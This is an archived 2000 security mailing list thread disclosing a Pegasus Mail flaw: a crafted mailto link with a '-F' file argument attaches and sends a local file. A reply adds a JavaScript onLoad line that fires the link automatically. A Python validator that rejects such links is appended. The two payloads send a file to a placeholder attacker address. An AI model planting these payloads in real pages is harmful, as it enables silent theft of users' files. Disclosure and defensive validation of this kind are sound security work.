Vulnerability Development mailing list archives

Re: Pegasus Mail


From: Knud Erik Hojgaard - CyberCity Support <kain () EGOTRIP DK>
Date: Tue, 3 Oct 2000 10:22:37 +0200

very interesting as a little javascript can 'click' a link for you..

<BODY onLoad="location.href='mailto:hacker () hakersite com -F c:\test.txt';">

Haven't tested since I haven't got Pegasus Mail, but it works for what I used
it for earlier ('clicking' the its:its:its. link)

Kind regards

Knud Erik Hojgaard <knud () cybercity dk>
Cybercity Erhvervssupport <support () erhverv cybercity dk>
http://www.cybercity.dk/support

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of
Imran Ghory
Sent: 2 October 2000 23:45
To: VULN-DEV () SECURITYFOCUS COM
Subject: Pegasus Mail


When using the following html,

<a href="mailto:hacker () hakersite com -F c:\test.txt"> Click
here</a>

When the user clicks on "Click here" Pegasus Mail will
automatically create a message which has a copy of the file
"c:\test.txt" and is addressed to "hacker () hakersite com" and
queues it ready to be sent without any further user intervention.

If instead of "hacker () hakersite com" we have a local user,
"hacker" the message won't be queued but just sent immediately.

As in order to have files stolen the user would have to click on the
dubious looking link, is this security risk serious?

Imran Ghory
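
The behaviour discussed in this thread depends on the text after `mailto:` reaching the mail client with spaces and an option-like token intact. The following is an added example, not code from the thread or from Pegasus Mail: a strict recipient check that a mailto handler could run before handing anything to the client. The names `recipients_from_mailto` and `UnsafeMailto`, the `example.com` addresses, and the policy of accepting only plain `user@domain` recipients are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Conservative address pattern (assumption: deliberately stricter than the
# mail RFCs). No whitespace, no quoting, must start with a letter or digit,
# so a leading "-" or "/" option marker can never match.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
_ADDR = re.compile(r"[A-Za-z0-9][A-Za-z0-9._%+-]*@" + _LABEL + r"(?:\." + _LABEL + r")+")


class UnsafeMailto(ValueError):
    """Raised when a mailto URL carries anything other than plain addresses."""


def recipients_from_mailto(url):
    """Return the recipient list of a mailto URL, or raise UnsafeMailto.

    The address part is percent-decoded first, so an encoded space (%20)
    is judged exactly like a literal one. Header fields after "?" are
    ignored here; only the recipient part is returned.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() != "mailto":
        raise UnsafeMailto("not a mailto URL")
    recipients = []
    for candidate in unquote(parts.path).split(","):
        # fullmatch: the whole comma-separated item must be one address,
        # so "user@example.com -F c:\test.txt" is rejected as a unit.
        if not _ADDR.fullmatch(candidate):
            raise UnsafeMailto("rejected recipient: %r" % candidate)
        recipients.append(candidate)
    return recipients


if __name__ == "__main__":
    # Constructed samples; the second has the shape posted in the thread.
    samples = [
        r"mailto:user@example.com",
        r"mailto:user@example.com -F c:\test.txt",
        r"mailto:user@example.com%20-F%20c:%5Ctest.txt",
        r"mailto:a@example.com,b@example.org?subject=hello",
    ]
    for sample in samples:
        try:
            print("accept", recipients_from_mailto(sample))
        except UnsafeMailto as err:
            print("reject", err)
```

Under this policy a bare local name with no `@domain` part is also refused, which covers the local-user case mentioned in the original message.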

